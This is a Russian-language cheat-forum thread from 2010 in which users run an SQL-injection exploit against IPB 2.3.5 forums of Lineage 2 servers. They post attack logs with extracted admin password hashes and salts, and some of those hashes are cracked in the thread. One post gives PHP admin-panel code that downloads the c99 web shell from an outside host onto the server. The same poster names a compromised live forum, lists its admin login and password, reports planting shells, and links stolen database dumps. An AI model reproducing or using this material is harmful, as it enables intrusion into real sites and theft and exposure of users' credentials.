Регистрация Главная Сообщество
Сообщения за день Справка Регистрация
Навигация
Zhyk.org LIVE! Реклама на Zhyk.org Правила Форума Награды и достижения Доска "почета"

Рабочая уязвимость на l2europe.net (сервер из топ15)

-

Баги и читы Lineage 2

- Уязвимости, баги и читы для Lineage 2 в этом разделе

Закрытая тема
 
Опции темы
Старый 08.04.2010, 19:58   #76
 Разведчик
Аватар для Toopoi
 
Toopoi никому не известный тип
Регистрация: 28.01.2010
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

умя такая проблема делаю все норм но какаято ошибка

*[Ссылки могут видеть только зарегистрированные пользователи. ]
/IDS bypass:1
/Cheking sql-injection..
-Forum unvulnerable
/Try [Ссылки могут видеть только зарегистрированные пользователи. ]
+[08.04.2010. 21:50:23]
+Total:1
Z:\usr\local\php5>
 
Старый 08.04.2010, 20:14   #77
 Пехотинец
Аватар для shamrik
 
shamrik скоро будет известенshamrik скоро будет известенshamrik скоро будет известен
Регистрация: 12.01.2010
Сообщений: 69
Популярность: 238
Сказал(а) спасибо: 86
Поблагодарили 97 раз(а) в 51 сообщениях
Отправить сообщение для shamrik с помощью ICQ
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

Цитата:
Сообщение от ToopoiПосмотреть сообщение
умя такая проблема делаю все норм но какаято ошибка

*[Ссылки могут видеть только зарегистрированные пользователи. ]
/IDS bypass:1
/Cheking sql-injection..
-Forum unvulnerable
/Try [Ссылки могут видеть только зарегистрированные пользователи. ]
+[08.04.2010. 21:50:23]
+Total:1
Z:\usr\local\php5>

Там уже стоит IPB 2.3.6
________________
C Жука не выгоните ^^)
Написал в асю - представься и уточни что с Жука, иначе игнор
 
Старый 09.04.2010, 11:26   #78
 Разведчик
Аватар для maksline
 
maksline никому не известный тип
Регистрация: 16.10.2009
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

я был бы очень признателен если бы вы помогли мне расшифровать
+ Ok, using hash 47afebaef8098a0af34963b813d10535
/ Trying to get the password salt
/
+ Ok, using salt ?T"{A
Спасибо за ранее

Последний раз редактировалось maksline; 09.04.2010 в 12:34.
 
Старый 09.04.2010, 19:29   #79
 Разведчик
Аватар для Toopoi
 
Toopoi никому не известный тип
Регистрация: 28.01.2010
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

дайти плиз форум с рабочий дырой где не проверял не рубит хоть разобратс либа я не то делаю либа не нахажу то что надо
 
Старый 09.04.2010, 19:57   #80
-= Чит-Воин =-
 Пехотинец
Аватар для cavern
 
cavern душа компанииcavern душа компанииcavern душа компанииcavern душа компанииcavern душа компанииcavern душа компанииcavern душа компанииcavern душа компании
Регистрация: 21.11.2009
Сообщений: 77
Популярность: 1063
Сказал(а) спасибо: 13
Поблагодарили 100 раз(а) в 36 сообщениях
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

еще один способ заливки шелла:
Админцентр > настройки > Cookies > Добавить настройку > название: shell > PHP код:
Код:
$data=implode('',file('http://www.proof-h.org/shell/c99.txt'));  
$fp=fopen('./shell.php','wb'); 
fputs($fp,$data); 
fclose($fp);
сохраняем, шелл будет доступен по /forum/admin/shell.php

кстати вот еще один шелл, как на видео, думаю с помощью заливки одного этот залить не составит труда: _http://slil.ru/28934193

maksline пфф расшифровал за 2 секунды, пароль: 147369
 
Старый 09.04.2010, 20:26   #81
Читер-спонсор
 Рыцарь
Аватар для SetFer
 
SetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражания
Регистрация: 30.03.2010
Сообщений: 324
Популярность: 1681
Сказал(а) спасибо: 453
Поблагодарили 592 раз(а) в 295 сообщениях
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

Attack(s):

+ [06.04.2010 22:57:13]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
- Script not found
/ Try лялялялялялял
+ [06.04.2010 22:57:14]
+ Total: 1

Ответьте на эту проблему плиз народ)
 
Старый 09.04.2010, 20:41   #82
 Разведчик
Аватар для SandeL
 
SandeL скоро будет известенSandeL скоро будет известенSandeL скоро будет известенSandeL скоро будет известен
Регистрация: 04.02.2010
Сообщений: 20
Популярность: 336
Сказал(а) спасибо: 32
Поблагодарили 31 раз(а) в 14 сообщениях
Отправить сообщение для SandeL с помощью ICQ Отправить сообщение для SandeL с помощью Skype™
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

Народ расшифруйте плиз

+ Ok, using hash b0ef4c06dbdc7185b043d2e125bd3923
/ Trying to get the password salt
/
+ Ok, using salt Eio+6
+ Enjoy!
 
Старый 09.04.2010, 21:33   #83
-= Чит-Воин =-
 Пехотинец
Аватар для cavern
 
cavern душа компанииcavern душа компанииcavern душа компанииcavern душа компанииcavern душа компанииcavern душа компанииcavern душа компанииcavern душа компании
Регистрация: 21.11.2009
Сообщений: 77
Популярность: 1063
Сказал(а) спасибо: 13
Поблагодарили 100 раз(а) в 36 сообщениях
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

можете потренироваться, хеши в PasswordPro расшифровывают
Код:
 Attack(s):

 + [09.04.2010 20:39:01]
 + http://mmo-itp.ru/forum/
 / IDS bypass: 1
 / Cheking sql-injection..
 + Forum vulnerable!
 / Using default table prefix: ibf_
 + Prefix ibf_ is correct
 + Using targeted user id 1
 / Trying to get the password hash
 + pass_hash=a1b820aa0f7fcd4a827d8286eddda74e
 + Ok, using hash a1b820aa0f7fcd4a827d8286eddda74e
 / Trying to get the password salt
 + pass_salt=-R]]3
 + Ok, using salt -R]]3
 + Enjoy!

 + [09.04.2010 20:56:14]
 + Total: 188
админ логин: Insane
пасс: yaebashu
залил шеллов в uploads, т.к. нет прав заливать в другие папки
первый шелл через скины: [Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
данные БД находятся в файле conf_global.php

п.с. сразу форум не убивайте тока)
п.с.с вот вся база одного из форумов, который уже удален _http://slil.ru/28934666
а вот отдельно дамп members.sql _http://slil.ru/28934674
кто знает что можно извлечь из базы ФОРУМА?

setfer префиксы хз, можно попробовать в пхп файле найти и заменить все ibf_ на ipb_ и то не факт что там такой префикс)
Script not found это значит что уязвимый код не найден, получить хеш не возможно


upd: [Ссылки могут видеть только зарегистрированные пользователи. ]
админ емайл [email protected]
пасс asdfasdf

шеллы:
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]

Последний раз редактировалось cavern; 09.04.2010 в 22:34. Причина: добавлено сообщение
 
Пользователь сказал cпасибо:
fuzzion (11.04.2010)
Старый 09.04.2010, 22:37   #84
Читер-спонсор
 Рыцарь
Аватар для SetFer
 
SetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражанияSetFer блестящий пример для подражания
Регистрация: 30.03.2010
Сообщений: 324
Популярность: 1681
Сказал(а) спасибо: 453
Поблагодарили 592 раз(а) в 295 сообщениях
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

B смысле в пхп в файле експлоита изменить все ipf на ipb?
 
Старый 16.04.2010, 12:39   #85
༼ ᕤ◕◡◕ ༽ᕤ
 Капитан
Аватар для Chipito
 
Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(
Регистрация: 09.12.2009
Сообщений: 256
Популярность: 20088
Золото Zhyk.Ru: 1
Сказал(а) спасибо: 181
Поблагодарили 681 раз(а) в 251 сообщениях
Отправить сообщение для Chipito с помощью ICQ
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

2.3.5 Не ломаются,надо чтоб был форум именно NULL RU
 
Старый 16.04.2010, 13:21   #86
Заблокирован
 Капитан
Аватар для Underwhy
 
Underwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слуху
Регистрация: 22.08.2009
Сообщений: 277
Популярность: 1328
Сказал(а) спасибо: 194
Поблагодарили 472 раз(а) в 220 сообщениях
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

Цитата:
Сообщение от chipitoПосмотреть сообщение
2.3.5 Не ломаются,надо чтоб был форум именно NULL RU

Вообще-то скрипт написан для 2.3.5
 
Старый 19.04.2010, 10:50   #87
 Разведчик
Аватар для sunches
 
sunches на правильном путиsunches на правильном пути
Регистрация: 12.12.2009
Сообщений: 24
Популярность: 149
Сказал(а) спасибо: 143
Поблагодарили 19 раз(а) в 9 сообщениях
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

+ [19.04.2010 10:47:59]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
- Forum unvulnerable
/ Try [Ссылки могут видеть только зарегистрированные пользователи. ]
+ [19.04.2010 10:48:00]
+ Total: 1

что это может быть?
 
Старый 19.04.2010, 11:08   #88
Заблокирован
 Капитан
Аватар для Underwhy
 
Underwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слуху
Регистрация: 22.08.2009
Сообщений: 277
Популярность: 1328
Сказал(а) спасибо: 194
Поблагодарили 472 раз(а) в 220 сообщениях
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

Цитата:
Сообщение от sunchesПосмотреть сообщение
+ [19.04.2010 10:47:59]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
- Forum unvulnerable
/ Try [Ссылки могут видеть только зарегистрированные пользователи. ]
+ [19.04.2010 10:48:00]
+ Total: 1

что это может быть?

1. Форум лиц
2. Форум лиц - заплатка
 
Старый 19.04.2010, 11:16   #89
 Разведчик
Аватар для sunches
 
sunches на правильном путиsunches на правильном пути
Регистрация: 12.12.2009
Сообщений: 24
Популярность: 149
Сказал(а) спасибо: 143
Поблагодарили 19 раз(а) в 9 сообщениях
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

спасибо теперь проблемка в egb

D:\>egb\"md5(md5($salt).md5($pass)).exe" conf.ini conf.txt
Number of GPU to be used: 1
Error reading file!


Добавлено через 56 минут
перепбрал кучу линаговских форумов все стоят на 2,3,6

Последний раз редактировалось sunches; 19.04.2010 в 12:12. Причина: Добавлено сообщение
 
Старый 20.04.2010, 18:26   #90
 Разведчик
Аватар для sunches
 
sunches на правильном путиsunches на правильном пути
Регистрация: 12.12.2009
Сообщений: 24
Популярность: 149
Сказал(а) спасибо: 143
Поблагодарили 19 раз(а) в 9 сообщениях
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

D:\>egb\"md5(md5($salt).md5($pass)).exe" conf.ini conf.txt
Number of GPU to be used: 1
Error reading file!

Народ помогите в чем проблема?
 
Закрытая тема


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
l2europe dtg Базы серверов и брут 15 23.03.2010 15:04
l2europe.net phreaker Архив 25 21.03.2010 18:33
[Помогите!] У меня не сохраняется топ15, ранк!! semenronaldo9 Общение и обсуждение Counter-Strike 9 21.03.2010 14:30

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 21:24.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net